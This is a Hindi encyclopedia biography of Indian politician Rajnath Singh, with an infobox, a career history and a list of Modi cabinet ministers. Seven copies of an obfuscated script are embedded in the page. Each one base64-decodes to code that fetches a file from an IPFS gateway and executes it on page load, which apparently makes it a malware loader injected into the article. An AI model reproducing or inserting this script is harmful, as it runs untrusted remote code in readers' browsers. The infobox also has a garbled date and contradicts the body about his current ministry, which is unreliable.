राजनाथ सिंह

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
राजनाथ सिंह
राजनाथ सिंह
पूरा नाम राजनाथ सिंह
जन्म 10 जुलाई, 1951
जन्म भूमि चकिया तहसील, वाराणसी, उत्तर प्रदेश
अभिभावक श्री राम बदन सिंह एवं श्रीमती गुजराती देवी
पति/पत्नी सावित्री सिंह
संतान दो पुत्र और एक पुत्री
नागरिकता भारतीय
पार्टी भारतीय जनता पार्टी
पद भारत के वर्तमान गृहमंत्री, भाजपा के पूर्व अध्यक्ष, उत्तर प्रदेश के पूर्व मुख्यमंत्री
कार्य काल गृहमंत्री- 26 मई 2014 से अब तक

अध्यक्ष- (दो बार) 24 दिसम्बर 2005 से 24 दिसम्बर 2009 तक, 23 जनवरी 2013 से अब तक
मुख्यमंत्री, उत्तर प्रदेश- 28 अक्टूबर 20008 मार्च 2002 तक

शिक्षा एम.एस.सी. (भौतिकी)
विद्यालय गोरखपुर विश्वविद्यालय
भाषा हिंदी, अंग्रेज़ी
अन्य जानकारी राजनाथ सिंह 1991 में जब उत्तर प्रदेश की भाजपा सरकार में शिक्षा मंत्री के अलावा वर्ष 1994 में राज्यसभा सांसद भी रह चुके हैं।
बाहरी कड़ियाँ आधिकरिक वेबसाइट
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

राजनाथ सिंह (अंग्रेज़ी: Rajnath Singh जन्म: 10 जुलाई, 1951, वाराणसी, उत्तर प्रदेश) भारतीय जनता पार्टी के प्रसिद्ध राजनीतिज्ञ और वर्तमान में भारत के रक्षामंत्री हैं। वह लखनऊ से सांसद हैं। राजनाथ सिंह उत्तर प्रदेश के भूतपूर्व मुख्यमंत्री तथा भारत सरकार में गृहमंत्री रहे हैं। वह 17वीं लोकसभा के मोदी मंत्रीमण्डल में रक्षामंत्री नियुक्त हुए हैं। वे पहले भाजपा के अध्यक्ष और भाजपा की उत्तर प्रदेश (जो उनका गृह राज्य भी है) ईकाई के अध्यक्ष भी रह चुके हैं। प्रारंभ में वे भौतिकी के व्याख्याता थे, पर शीघ्र जनता पार्टी से जुड़ने के लिए उन्होंने राष्ट्रीय स्वयंसेवक संघ से अपने दीर्घ संबंधों का उपयोग किया, जिसके कारण वे उत्तर प्रदेश में कई पदों पर विराजमान हुए।

जीवन परिचय

राजनाथ सिंह का जन्म 10 जुलाई, 1951 को वाराणसी के चकिया तहसील में हुआ था। उनके पिता का नाम श्री राम बदन सिंह और माता का नाम श्रीमती गुजराती देवी था। राजनाथ सिंह ने सावित्री सिंह से विवाह किया है। उनके दो पुत्र और एक पुत्री हैं। दोनों पुत्र राजनीति में सक्रिय हैं। एक साधारण कृषक परिवार में जन्मे राजनाथ सिंह ने आगे चलकर गोरखपुर विश्वविद्यालय से प्रथम क्ष्रेणी में भौतिक शास्त्र में आचार्य की उपाधि प्राप्त की। वो 13 साल की आयु से (1964 सन से) संघ परिवार से जुड़े हुए हैं। मिर्जापुर में भौतिकी व्याख्यता की नौकरी लगने के बाद भी संघ से जुड़े रहे। 1974 में उन्हें भारतीय जनसंघ का सचिव नियुक्त किया गया। राजनाथ सिंह 1988 में यूपी विधान परिषद के सदस्य बने। 1991 में जब राज्य में बीजेपी की सरकार बनी तो राजनाथ सिंह शिक्षा मंत्री बने। 1994 में वह राज्यसभा के लिए चुने गए। 1997 में वह प्रदेश भारतीय जनता पार्टी के अध्यक्ष बने। 2000 में वह उत्तर प्रदेश के मुख्यमंत्री बने। 2002 में वह पार्टी के राष्ट्रीय महामंत्री बने और 2003 में केंद्रीय कृषि मंत्री बने। 2005 में उन्होंने पार्टी का सर्वोच्च पद संभाला।[1]

राजनीतिक कैरियर

वर्ष 1964 में 13 वर्ष की अवस्था में ही वे राष्ट्रीय स्वयंसेवक संघ से जुड़े। व्याख्याता बनने के बाद भी संघ से उनका जुड़ाव बना रहा। कदम-दर-कदम आगे बढ़ने वाले राजनाथ सिंह ने 1969 में गोरखपुर में भाजपा की छात्र इकाई अखिल भारतीय विद्यार्थी परिषद (एबीवीपी) में संगठन सचिव से राजनीतिक करियर की शुरुआत की। 1974 में वे जनसंघ के मिर्जापुर इकाई के सचिव बने। आपातकाल के दौरान राजनाथ सिंह जयप्रकाश नारायण के आंदोलन में शामिल हुए और जेल गए।

भाजपा के अध्यक्ष

भाजपा के दिग्गज नेता लालकृष्ण आडवाणी के बाद 2005 में भाजपा की बागडोर संभालने वाले राजनाथ सिंह ने पार्टी को फिर से एकजुट किया और पार्टी की मूल विचारधारा हिंदुत्व पर ध्यान केंद्रित किया। उन्होंने कहा कि अयोध्या में राम मंदिर निर्माण में कोई समझौता नहीं होगा। भारतीय जनता पार्टी (भाजपा) के अध्यक्ष चुने गए राजनाथ सिंह पहले भी विभिन्न संकटों के बीच सरताज बनकर उभरे। नितिन गडकरी के बाद भाजपा की बागडोर संभालने वाले 61 वर्षीय सिंह उत्तर प्रदेश से हैं। राजनीतिक हलकों में उन्हें काफ़ी मृदुभाषी और बेलाग बोलने वालों में माना जाता है। दिसंबर, 2009 के दौरान जब राजनाथ सिंह के बाद अध्यक्ष पद पर नितिन गडकरी आए थे। लेकिन 2013 की शुरुआत में, अंतिम समय में हुए जबर्दस्त उलटफेर में नितिन गडकरी भाजपा अध्यक्ष पद की दौड़ से बाहर हो गए और इसके बाद दूसरी बार आम सहमति से राजनाथ सिंह की भाजपा अध्यक्ष के रूप में ताजपोशी हुई। पार्टी के पास निश्चित तौर पर कुछ विकल्प थे लेकिन राजनाथ सिंह की निर्विवाद और प्रतिद्वंद्वियों के बीच बेहतर छवि ने उनके नाम पर सहमति बनाने में मदद की। बहरहाल, 2009 में पार्टी को केंद्र में सत्ता में लाने में नाकामी तो मिली ही, साथ ही 2004 की तुलना में पार्टी को 22 सीटें भी कम मिलीं।

उत्तर प्रदेश के मुख्यमंत्री एवं अन्य पद

पहली बार 1977 में राजनाथ सिंह उत्तर प्रदेश से विधायक बने। 1977 में वे भाजपा के राज्य सचिव बने। 1986 में भारतीय जनता युवा मोर्चा के राष्ट्रीय महासचिव बनने वाले राजनाथ सिंह 1988 में इसके राष्ट्रीय अध्यक्ष बनाए गए। वर्ष 1988 में ही सिंह उत्तरप्रदेश में विधान परिषद के सदस्य चुने गए। कल्याण सिंह सरकार के दौरान वे शिक्षामंत्री बने। उत्तर प्रदेश की सियासत में भले ही वे लंबी पारी खेल चुके हो लेकिन संसद में वे पहली बार 1994 में पहुंचे जब उन्हें राज्यसभा टिकट मिला। ऊपरी सदन में उन्हें भाजपा का मुख्य सचेतक भी बनाया गया। वर्ष 1997 में जब उत्तरप्रदेश राजनीतिक संकट का सामना कर रहा था, एक बार फिर से उन्होंने राज्य पार्टी अध्यक्ष की बागडोर संभाली और इस पद पर 1999 तक रहे। इसके बाद केंद्र में अटल बिहारी वाजपेयी के नेतृत्व में राजग सरकार में भूतल परिवहन मंत्री बने। केंद्र और राज्यों के बीच उनका आना-जाना लगा रहा। 28 अक्तूबर, 2000 को वे राम प्रकाश गुप्त की जगह उत्तर प्रदेश के मुख्यमंत्री बने। 2002 तक वे राज्य के मुख्यमंत्री रहे, लेकिन तब तक राज्य में समाजवादी पार्टी और बहुजन समाज पार्टी बढ़त बना चुकी थीं। भाजपा ने बसपा प्रमुख मायावती को उत्तर प्रदेश की मुख्यमंत्री के तौर पर समर्थन देने को फैसला किया लेकिन राजनाथ सिंह ने इस कदम पर एतराज जाहिर किया था। इसके बाद एक बार फिर से वे भाजपा के राष्ट्रीय महासचिव बने। किसान परिवार से आने वाले राजनाथ सिंह 2003 में राजद से अजित सिंह के अलग होने के बाद वाजपेयी मंत्रिमंडल में कृषिमंत्री के तौर पर वापसी की। भाजपा में राजनाथ सिंह के आगे बढ़ने की यात्रा जारी रही। 31 दिसंबर 2005 को वे राष्ट्रीय अध्यक्ष बनाए गए। उनके कार्यकाल में पहली बार कर्नाटक में भाजपा सत्ता में आई।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. राजनाथ सिंह (हिंदी) आईबीएन ख़बर लाइव। अभिगमन तिथि: 29 मई, 2014।
  2. राजनाथ सिंह : प्रोफाइल (हिंदी) वेबदुनिया हिंदी। अभिगमन तिथि: 29 मई, 2014।

बाहरी कड़ियाँ

संबंधित लेख

नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल

क्रमांक मंत्री नाम मंत्रालय
प्रधानमंत्री
नरेन्द्र मोदी 1. कार्मिक, लोक शिकायत एवं पेंशन मंत्रालय

2. परमाणु ऊर्जा विभाग
3. अंतरिक्ष विभाग
4. सभी महत्वपूर्ण नीतिगत मुद्दे और अन्य सभी विभाग जो किसी मंत्री को आवंटित नहीं किए गए हैं।

कैबिनेट मंत्री
1. राजनाथ सिंह रक्षा मंत्रालय
2. अमित शाह 1. गृह मंत्रालय

2. सहकारिता मंत्रालय

3. नितिन जयराम गडकरी सड़क परिवहन एवं राजमार्ग मंत्रालय
4. निर्मला सीतारमण 1. वित्त मंत्रालय

2. कारपोरेट कार्य मंत्रालय

5. नरेन्द्र सिंह तोमर कृषि एवं कृषक कल्याण मंत्रालय
6. सुब्रह्मण्यम जयशंकर विदेश मंत्री
7. अर्जुन मुंडा जनजातीय कार्य मंत्री
8. स्मृति जुबिन ईरानी महिला एवं बाल विकास मंत्री
9. पीयूष गोयल 1. कपड़ा मंत्रालय

2. वाणिज्य और उद्योग मंत्रालय
3. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय

10. धर्मेन्द्र प्रधान 1. शिक्षा मंत्रालय

2. कौशल विकास और उद्यमिता मंत्रालय

11. प्रह्लाद जोशी 1. संसदीय मामलों के मंत्री

2. कोयला मंत्रालय
3. खान मंत्रालय

12. नारायण तातू राणे सूक्ष्म, लघु एवं मध्यम उद्यम मंत्री
13. सर्बानन्द सोनोवाल 1. बंदरगाह, नौवहन और जलमार्ग मंत्रालय

2. आयुष मंत्रालय

14. मुख़्तार अब्बास नक़वी अल्पसंख्यक मंत्रालय
15. वीरेन्द्र कुमार खटीक सामाजिक न्याय और अधिकारिता मंत्रालय
16. गिरिराज सिंह 1. ग्रामीण विकास मंत्रालय

2. पंचायती राज मंत्रालय

17. ज्योतिरादित्य एम. सिंधिया नागरिक उड्डयन मंत्रालय
18. रामचंद्र प्रसाद सिंह इस्पात मंत्रालय
19. अश्विनी वैष्णव 1. रेल मंत्रालय

2. संचार मंत्रालय
3. इलेक्ट्रॉनिक्स और सूचना प्रौद्योगिकी मंत्रालय

20. पशुपति कुमार पारस खाद्य प्रसंस्करण उद्योग मंत्रालय
21. गजेंद्र सिंह शेखावत जल शक्ति मंत्रालय
22. किरण रिजिजू कानून और न्याय मंत्रालय
23. राजकुमार सिंह 1. विद्युत मंत्रालय

2. नवीन और नवीकरणीय ऊर्जा मंत्रालय

24. हरदीप सिंह पुरी 1. पेट्रोलियम एवं प्राकृतिक गैस मंत्रालय

2. आवास और शहरी मामलों के मंत्रालय

25. मनसुख मंडाविया 1. स्वास्थ्य और परिवार कल्याण मंत्रालय

2. रासायनिक उर्वरक मंत्रालय

26. भूपेन्द्र यादव 1. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय

2. श्रम और रोजगार मंत्रालय

27. महेंद्र नाथ पाण्डेय भारी उद्योग मंत्रालय
28. पुरुषोत्तम रूपाला मत्स्य पालन, पशुपालन और डेयरी मंत्रालय
29. जी. किशन रेड्डी 1. संस्कृति मंत्रालय

2. पर्यटन मंत्रालय
3. पूर्वोत्तर क्षेत्र के विकास मंत्रालय

30. अनुराग ठाकुर 1.सूचना और प्रसारण मंत्रालय

2. युवा मामले और खेल मंत्रालय

राज्य मंत्री (स्वतंत्र प्रभार)
1. राव इन्द्रजीत सिंह 1. सांख्यिकी और कार्यक्रम कार्यान्वयन मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार)

2. योजना मंत्रालय
3. कॉर्पोरेट मामलों के मंत्रालय में राज्य मंत्रालय

2. जितेन्द्र सिंह (भाजपा) 1. विज्ञान और प्रौद्योगिकी मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार)

2. पृथ्वी विज्ञान मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार)
3. प्रधानमंत्री कार्यालय में राज्य मंत्री
4. कार्मिक, लोक शिकायत और पेंशन मंत्रालय में राज्य मंत्री
5. परमाणु ऊर्जा विभाग में राज्य मंत्री
6. अंतरिक्ष विभाग में राज्य मंत्री

राज्य मंत्री
1. श्रीपद येस्सो नायक 1. बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री

2. पर्यटन मंत्रालय में राज्य मंत्री

2. फग्गन सिंह कुलस्ते 1. इस्पात मंत्रालय में राज्य मंत्री

2. ग्रामीण विकास मंत्रालय में राज्य मंत्री

3. प्रहलाद सिंह पटेल 1. जल शक्ति मंत्रालय में राज्य मंत्री

2. खाद्य प्रसंस्करण उद्योग मंत्रालय में राज्य मंत्री

4. अश्विनी कुमार चौबे 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री

2. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय में राज्य मंत्री

5. अर्जुन राम मेघवाल 1. संसदीय कार्य मंत्रालय में राज्य मंत्री

2. संस्कृति मंत्रालय में राज्य मंत्री

6. जनरल (सेवानिवृत्त) वी. के. सिंह 1. सड़क परिवहन और राजमार्ग मंत्रालय में राज्य मंत्री

2. नागर विमानन मंत्रालय में राज्य मंत्री

7. कृष्ण पाल गुर्जर 1. विद्युत मंत्रालय में राज्य मंत्री

2. भारी उद्योग मंत्रालय में राज्य मंत्री

8. रावसाहेब दानवे 1. रेल मंत्रालय में राज्य मंत्री

2. कोयला मंत्रालय में राज्य मंत्री
3. खान मंत्रालय में राज्य मंत्री

9. रामदास अठावले सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री
10. साध्वी निरंजन ज्योति 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री

2. ग्रामीण विकास मंत्रालय में राज्य मंत्री

11. डॉ. संजीव कुमार बालयान पशुपालन, मत्स्य पालन और दुग्ध उत्पादन मंत्रालय में राज्य मंत्री
12. नित्यानंद राय गृह मंत्रालय में राज्य मंत्री
13. पंकज चौधरी वित्त मंत्रालय में राज्य मंत्री
14. अनुप्रिया सिंह पटेल उद्योग एवं वाणिज्य मंत्रालय में राज्य मंत्री
15. एस. पी. सिंह बघेल न्याय और कानून मंत्रालय में राज्य मंत्री
16. राजीव चंद्रशेखर 1. कौशल विकास और उद्यमिता मंत्रालय में राज्य मंत्री

2. इलेक्ट्रॉनिक्स और सूचना प्रौद्योगिकी मंत्रालय में राज्य मंत्री

17. शोभा करंदलाजे कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री
18. भानु प्रताप सिंह वर्मा लघु, मध्यम और सूक्ष्म उद्योग मंत्रालय में राज्य मंत्री
19. दर्शना जरदोश 1. कपड़ा मंत्रालय में राज्य मंत्री

2. रेल मंत्रालय में राज्य मंत्री

20. वी. मुरलीधरन 1. विदेश मंत्रालय में राज्य मंत्री

2. संसदीय कार्य मंत्रालय में राज्य मंत्री

21. मीनाक्षी लेखी 1. विदेश मंत्रालय में राज्य मंत्री

2. संस्कृति मंत्रालय में राज्य मंत्री

22. सोम प्रकाश वाणिज्य और उद्योग मंत्रालय में राज्य मंत्री
23. रेणुका सिंह सरुता आदिवासी मंत्रालय में राज्य मंत्री
24. रामेश्वर तेली 1. पेट्रोलियम और प्राकृतिक गैस मंत्रालय में राज्य मंत्री

2. श्रम और रोजगार मंत्रालय में राज्य मंत्री

25. कैलाश चौधरी कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री
26. अन्नपूर्णा देवी यादव शिक्षा मंत्रालय में राज्य मंत्री
27. ए. नारायणस्वामी सामाजिक न्याय मंत्रालय में राज्य मंत्री
28. कौशल किशोर शहरी विकास एवं आवास मंत्रालय में राज्य मंत्री
29. अजय भट्ट 1. रक्षा मंत्रालय में राज्य मंत्री

2. पर्यटन मंत्रालय में राज्य मंत्री

30. बी. एल. वर्मा 1. उत्तर पूर्वी क्षेत्र के विकास मंत्रालय में राज्य मंत्री

2. सहकारिता मंत्रालय में राज्य मंत्री

31. अजय कुमार मिश्रा गृह मंत्रालय में राज्य मंत्री
32. देवुसिंह चौहान संचार मंत्रालय में राज्य मंत्री
33. भगवंत खुबा 1. नवीन और नवीकरणीय ऊर्जा मंत्रालय में राज्य मंत्री

2. रसायन और उर्वरक मंत्रालय में राज्य मंत्री

34. कपिल पाटिल पंचायती राज मंत्रालय में राज्य मंत्री
35. प्रतिमा भौमिक सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री
36. सुभाष सरकार शिक्षा मंत्रालय में राज्य मंत्री
37. डॉ. भागवत किशनराव कराड वित्त मंत्रालय में राज्य मंत्री
38. राजकुमार रंजन सिंह 1. विदेश मंत्रालय में राज्य मंत्री

2. शिक्षा मंत्रालय में राज्य मंत्री

39. डॉ. भारती प्रवीण पवार स्वास्थ्य एवं परिवार कल्याण मंत्रालय में राज्य मंत्री
40. बिश्वेश्वर टुडू 1. जनजातीय मामलों के मंत्रालय में राज्य मंत्री

2. जल शक्ति मंत्रालय में राज्य मंत्री

41. शांतनु ठाकुर बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री
42. डॉ. मुंजापारा महेंद्रभाई 1. महिला एवं बाल विकास मंत्रालय में राज्य मंत्री

2. आयुष मंत्रालय में राज्य मंत्री

43. जॉन बारला अल्पसंख्यक मंत्रालय में राज्य मंत्री
44. एल. मुरुगन 1. मत्स्य पालन, पशुपालन और डेयरी मंत्रालय में राज्य मंत्री

2. सूचना एवं प्रसारण मंत्रालय में राज्य मंत्री

45. निसिथ प्रमाणिक 1. गृह मंत्रालय में राज्य मंत्री

2. युवा मामले और खेल मंत्रालय में राज्य मंत्री

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>